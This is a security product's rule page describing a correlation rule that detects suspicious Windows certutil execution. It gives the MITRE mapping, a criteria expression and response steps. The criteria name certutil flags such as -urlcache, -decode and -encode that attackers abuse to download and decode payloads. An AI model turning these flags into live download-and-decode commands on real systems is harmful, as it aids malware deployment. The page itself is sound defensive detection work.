Suspicious Certutil Command Execution

Rule added on 30th April, 2024

Rule type:

Correlation

Rule description:

Certutil is a legitimate command-line tool provided by Microsoft in its windows operating systems. It is used to view, manage, and troubleshoot certificates.

However, this may be exploited by attackers to perform malicious activities such as to extract sensitive information like encryption keys, digital signatures from the certificates.

Impact:

It can impact the organizations in the following ways:

• Privilege Escalation
• Data exfiltration
• Malware deployment

Data source:

Windows:

Required configuration: The rules is based on the process creation and termination. Prerequisites required are installing and configuring Sysmon, enabling audit process creation audit policy, and the command line auditing.

Relevant MITRE ATT&CK techniques and tactics:

Tactics: TA0005- Defense Evasion

Techniques: T1140- Deobfuscate/Decode Files or Information

Criteria:

((Command line contains certutil AND (Command line contains -URL OR Command line contains /URL OR Command line contains -ping OR Command line contains /pingURL) )OR (Command line contains -decode OR Command line contains /decode OR Command line contains -decodehex OR Command line contains/decodehex OR Command line contains -urlcache OR Command line contains /urlcache OR Command line contains -verifyctl OR Command line contains /verifyctl OR Command line contains -encode OR Command line contains /encode))

'pingURL' or 'ping' - These commands are used to send requests to URLs or hosts for checking connectivity, measuring response time, and more.

The use of the 'certutil' command, along with them, may indicate a potential attempt to interact with remote sources.

'decode', 'decodehex', 'encode' '-urlcache', and 'verifyctl' - These are used for decoding, encoding, caching and verifying operations. Their use along with 'certutil' may indicate a potential malicious attempt to manipulate certificates.

When to enable this rule:

Enabling this rule will help you meet the security standards' requirements listed below:

Security standards (NIST CSF 2.0):

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified when a suspicious 'certutil' command is executed. This enables you to modify Certutil permissions accessibility and place stronger access control measures.

Known false positives: This event might be generated by administrators while updating the digital certificates on Windows.

Next steps:

When this alert is triggered, the following measures can be implemented:

• Identification: Identify the alert as a new incident or within an ongoing incident.
• Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
• Response: Respond promptly by initiating an automated workflow to cease the malicious process.
• Deploy Access Controls: Implement access controls and permissions to restrict the execution of Certutil by unauthorized users.